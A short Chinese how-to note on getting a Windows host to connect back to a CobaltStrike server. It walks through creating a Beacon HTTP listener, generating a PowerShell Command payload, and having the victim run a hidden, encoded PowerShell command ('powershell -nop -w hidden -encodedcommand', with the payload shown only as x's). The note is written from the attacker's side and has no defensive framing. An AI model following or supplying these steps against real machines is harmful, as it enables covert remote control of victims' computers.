【笔记】CobaltStrike通过PowerShell命令实现Windows上线
前言
CobaltStrike通过PowerShell命令实现Windows上线
、
攻击者添加监听器
CobaltStrike->监听器->添加
- 创建监听器->
保存
名字:自定义
Payload:Beacon HTTP
HTTP地址:CobaltStrike服务端IP
HTTP地址(Stager):CobaltStrike服务端IP
- 反向连接监听器创建成功后会自动在CobaltStrike服务端监听端口,等待受害者上线
攻击者生成PowerShell命令
攻击->生成后门->Payload生成器
监听器选择上一步骤创建的监听器,输出格式选择PowerShell Command,根据需要在x64勾选或取消勾选使用x64 payload->生成
- 得到
payload.txt文件
受害者执行PowerShell命令
1 | powershell -nop -w hidden -encodedcommand xxxxxxxx |